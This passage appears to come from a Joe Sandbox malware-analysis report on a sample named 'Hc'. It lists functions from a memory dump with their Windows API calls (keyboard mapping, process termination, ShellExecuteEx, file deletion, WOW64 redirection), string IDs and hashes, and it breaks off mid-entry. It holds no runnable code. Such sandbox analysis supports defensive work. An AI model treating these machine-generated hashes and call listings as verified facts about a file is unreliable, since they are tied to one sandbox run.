                                                                  • Instruction Fuzzy Hash: 2D0144B5E00719BBEB10AFA59C49E8E7F79EB44751F004165FA05AB280E6709C40CF90
                                                                  Function 0062327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 006232AF
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 006232B7
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 006232C2
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 006232CD
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 006232D5
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 006232DD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: 010dd9dd2683a7733f606b7d599155c924284bb3d6939423a6d0166a8d83b4c5
                                                                  • Instruction ID: 956e07e63f6c7ee2b78a7539c09d315527ba7ae3a837461fdb9f44699db6f05b
                                                                  • Opcode Fuzzy Hash: 010dd9dd2683a7733f606b7d599155c924284bb3d6939423a6d0166a8d83b4c5
                                                                  • Instruction Fuzzy Hash: A40167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                  Function 0068F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0068F447
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0068F45D
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0068F46C
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068F47B
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068F485
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0068F48C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: f4ddfccc45ed6de487d7014344d319d3d8554ea4378bff8a0374090c74348bd5
                                                                  • Instruction ID: 1404253b7e354c821ba36c9df5d0a9ddd2892a6d34ca1c50f4d8a00ed5714e41
                                                                  • Opcode Fuzzy Hash: f4ddfccc45ed6de487d7014344d319d3d8554ea4378bff8a0374090c74348bd5
                                                                  • Instruction Fuzzy Hash: 4FF0B4B2201158BBE72057529C0EEEF3F7DEFC6B11F000268F601D5091FBA01A81C6B5
                                                                  Function 006634D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClientRect.USER32(?), ref: 006634EF
                                                                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00663506
                                                                  • GetWindowDC.USER32(?), ref: 00663512
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 00663521
                                                                  • ReleaseDC.USER32(?,00000000), ref: 00663533
                                                                  • GetSysColor.USER32(00000005), ref: 0066354D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                  • String ID:
                                                                  • API String ID: 272304278-0
                                                                  • Opcode ID: ab1c2e6f15308cb070c659d63384f554ed11760d07ff090e55e4fa7e3aaae73e
                                                                  • Instruction ID: ae421396e93d5dbacce548151f970a1b28eb946a666a42be2f190548b8c1bb6e
                                                                  • Opcode Fuzzy Hash: ab1c2e6f15308cb070c659d63384f554ed11760d07ff090e55e4fa7e3aaae73e
                                                                  • Instruction Fuzzy Hash: D6012872500115EFDB605F64DC08BE97BB6FB04321F501260FA1AA62A1EB311EA2AF11
                                                                  Function 006821C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 006821CC
                                                                  • UnloadUserProfile.USERENV(?,?), ref: 006821D8
                                                                  • CloseHandle.KERNEL32(?), ref: 006821E1
                                                                  • CloseHandle.KERNEL32(?), ref: 006821E9
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006821F2
                                                                  • HeapFree.KERNEL32(00000000), ref: 006821F9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                  • String ID:
                                                                  • API String ID: 146765662-0
                                                                  • Opcode ID: 540c0b233470d132fa1244953682904f072c87aa13f351a1e5dfd8881f5794ec
                                                                  • Instruction ID: 91956f1def3fbf720d0ee24cdacf35f0bc90de04ff172a479557d7fcd158ab49
                                                                  • Opcode Fuzzy Hash: 540c0b233470d132fa1244953682904f072c87aa13f351a1e5dfd8881f5794ec
                                                                  • Instruction Fuzzy Hash: 0BE0E5F6008105BBDB011FA5EC0C94ABF7AFF49322B105320F2258A070EB3294A0DB50
                                                                  Function 006AB7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 006AB903
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • GetProcessId.KERNEL32(00000000), ref: 006AB998
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006AB9C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                  • String ID: <$@
                                                                  • API String ID: 146682121-1426351568
                                                                  • Opcode ID: e2d8eb23392b2a410836585407e0d5b11be8953d0d738f914f76fb6191429d2e
                                                                  • Instruction ID: 151ce82f0399fe9ff8560752b24a2d869338f29f7fe54bf9507b3c1124d2753e
                                                                  • Opcode Fuzzy Hash: e2d8eb23392b2a410836585407e0d5b11be8953d0d738f914f76fb6191429d2e
                                                                  • Instruction Fuzzy Hash: 89714575A00625DFCB10EF54C494A9EBBF6FF09310F048499E856AB392CB75AD41CF94
                                                                  Function 006B4818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 006B48D1
                                                                  • IsMenu.USER32(?), ref: 006B48E6
                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006B492E
                                                                  • DrawMenuBar.USER32 ref: 006B4941
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Menu$Item$DrawInfoInsert
                                                                  • String ID: 0
                                                                  • API String ID: 3076010158-4108050209
                                                                  • Opcode ID: e0fa7a83db8f5c56af5ea76f5abde36ada10ef7c18ceae4d2b7bddc8a60a2273
                                                                  • Instruction ID: ef1442cf12b9dc0667665622742b2e03d17f59d9fe696e27cda6bf60de30a007
                                                                  • Opcode Fuzzy Hash: e0fa7a83db8f5c56af5ea76f5abde36ada10ef7c18ceae4d2b7bddc8a60a2273
                                                                  • Instruction Fuzzy Hash: 724157B5A00209EFDB20DF51D884AEABBBAFF06364F044129E9559B351DB30ED85CF60
                                                                  Function 0068272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 006827B3
                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 006827C6
                                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 006827F6
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$_wcslen$ClassName
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 2081771294-1403004172
                                                                  • Opcode ID: 35b666bfc0c12350c710af79d32396643dbb843db8804ceac99fccdb536396e4
                                                                  • Instruction ID: 3184062b612fe00cd828a6f7606f42756da65cea9223640ebded19007f300cc7
                                                                  • Opcode Fuzzy Hash: 35b666bfc0c12350c710af79d32396643dbb843db8804ceac99fccdb536396e4
                                                                  • Instruction Fuzzy Hash: E32105B1940105BEDB45BBA0DC56CFE7BBADF45360F10822DF421A72E1DF34494A8B60
                                                                  Function 006B39B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 006B3A29
                                                                  • LoadLibraryW.KERNEL32(?), ref: 006B3A30
                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 006B3A45
                                                                  • DestroyWindow.USER32(?), ref: 006B3A4D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                  • String ID: SysAnimate32
                                                                  • API String ID: 3529120543-1011021900
                                                                  • Opcode ID: 6bec24066de66264e092f250a55580e11c338d84a3e4de89e31727587d29b471
                                                                  • Instruction ID: ddba58085a984b67cab873f238aa9b02aab64483f35920070cdc0c6892eb9505
                                                                  • Opcode Fuzzy Hash: 6bec24066de66264e092f250a55580e11c338d84a3e4de89e31727587d29b471
                                                                  • Instruction Fuzzy Hash: BF218EB1700225AFEB109F64DC80FFB77ABEB45364F215228FA9196390E771CD919760
                                                                  Function 006B9A25 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetCursorPos.USER32(?), ref: 006B9A5D
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006B9A72
                                                                  • GetCursorPos.USER32(?), ref: 006B9ABA
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 006B9AF0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID: (o
                                                                  • API String ID: 2864067406-1684096767
                                                                  • Opcode ID: d09d85291dfd722bddb60661ef1efcd9b57663825ed81296d4304fd17ee39938
                                                                  • Instruction ID: 4a138e10dc33a836b4bc0c2f9fbfe54b6ae115fc4d1ca8db31cb5f096692a102
                                                                  • Opcode Fuzzy Hash: d09d85291dfd722bddb60661ef1efcd9b57663825ed81296d4304fd17ee39938
                                                                  • Instruction Fuzzy Hash: E221ABB5600018AFCF258F98C858EFA7BBBEF09350F404169FA058B2A1E7759991DF60
                                                                  Function 00621AAC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00621AF4
                                                                  • GetClientRect.USER32(?,?), ref: 006631F9
                                                                  • GetCursorPos.USER32(?), ref: 00663203
                                                                  • ScreenToClient.USER32(?,?), ref: 0066320E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID: (o
                                                                  • API String ID: 4127811313-1684096767
                                                                  • Opcode ID: e2414bb00a6fe88593c35c8bea49a5a2cc2554d63455d908724bfd97572f5af8
                                                                  • Instruction ID: 25173ab51a46c53f6845159d5ede3c206b52117062ecf5b2aadbb3ec4a3d2e59
                                                                  • Opcode Fuzzy Hash: e2414bb00a6fe88593c35c8bea49a5a2cc2554d63455d908724bfd97572f5af8
                                                                  • Instruction Fuzzy Hash: 80118F7190152AFBCB10DF94D9468FEB7BAFB06340F000456E912E7240D730BB91CBA5
                                                                  Function 006450DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0064508E,?,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002), ref: 006450FD
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00645110
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0064508E,?,?,0064502E,?,006E98D8,0000000C,00645185,?,00000002,00000000), ref: 00645133
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                  • API String ID: 4061214504-1276376045
                                                                  • Opcode ID: bfa398a678e2f4e9d026bafd7ed3b3a1d4ac80747c0048b379e92e68806d2663
                                                                  • Instruction ID: 053b827eef08b619310ef7e87a2f3cce95fff21500b7da7b1f3b48bac37e90dd
                                                                  • Opcode Fuzzy Hash: bfa398a678e2f4e9d026bafd7ed3b3a1d4ac80747c0048b379e92e68806d2663
                                                                  • Instruction Fuzzy Hash: 21F0C830900208BFDB105F94DC49BEDBFBBEF05712F000168F806A6261DB349D80CA90
                                                                  Function 0062663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062664A
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0062665C
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,0062668B,?,?,006262FA,?,00000001,?,?,00000000), ref: 0062666E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 145871493-3689287502
                                                                  • Opcode ID: 606189e6fc990615fee96df0a0604c5fe78a2fbe85a6dc814e02b281acecbfee
                                                                  • Instruction ID: 0035de613e84679d5dcb3dab5ab39ded53f28534cb581dc37889af534f2307b2
                                                                  • Opcode Fuzzy Hash: 606189e6fc990615fee96df0a0604c5fe78a2fbe85a6dc814e02b281acecbfee
                                                                  • Instruction Fuzzy Hash: 9DE0CD76A02A321793121729FC0CB9E652FDF82F12F060325FC00DA304EF54CC4286E5
                                                                  Function 00626607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626610
                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00626622
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00665657,?,?,006262FA,?,00000001,?,?,00000000), ref: 00626635
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressFreeLoadProc
                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                  • API String ID: 145871493-1355242751
                                                                  • Opcode ID: 12fd741bb3dc83c9a5434320a5719aa3dbea3a74c22baf002faff7c0193f0792
                                                                  • Instruction ID: a6d9cad0a80c68b105ea8d33da14f3d102a66b115877900786f612fea16b6c22
                                                                  • Opcode Fuzzy Hash: 12fd741bb3dc83c9a5434320a5719aa3dbea3a74c22baf002faff7c0193f0792
                                                                  • Instruction Fuzzy Hash: 30D01275612A325743222729BC189CE6A1B9E91F113060125F800AA214EF64CD528B99
                                                                  Function 00693306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006935C4
                                                                  • DeleteFileW.KERNEL32(?), ref: 00693646
                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0069365C
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0069366D
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0069367F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$Copy
                                                                  • String ID:
                                                                  • API String ID: 3226157194-0
                                                                  • Opcode ID: c7c2dc5e9ef1c486e0bd24b542914ed8b8c6ca7adc6f65848180ff8173649128
                                                                  • Instruction ID: 48c1b3ddb6dfce499e878494c5b45d61d586ae4810cf62b3d6476d27bb30153d
                                                                  • Opcode Fuzzy Hash: c7c2dc5e9ef1c486e0bd24b542914ed8b8c6ca7adc6f65848180ff8173649128
                                                                  • Instruction Fuzzy Hash: 95B14F72D00129ABDF51DFA4CC85EDEB7BEEF48314F0040AAF509E6251EA349B458F65
                                                                  Function 006AADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32 ref: 006AAE87
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006AAE95
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 006AAEC8
                                                                  • CloseHandle.KERNEL32(?), ref: 006AB09D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
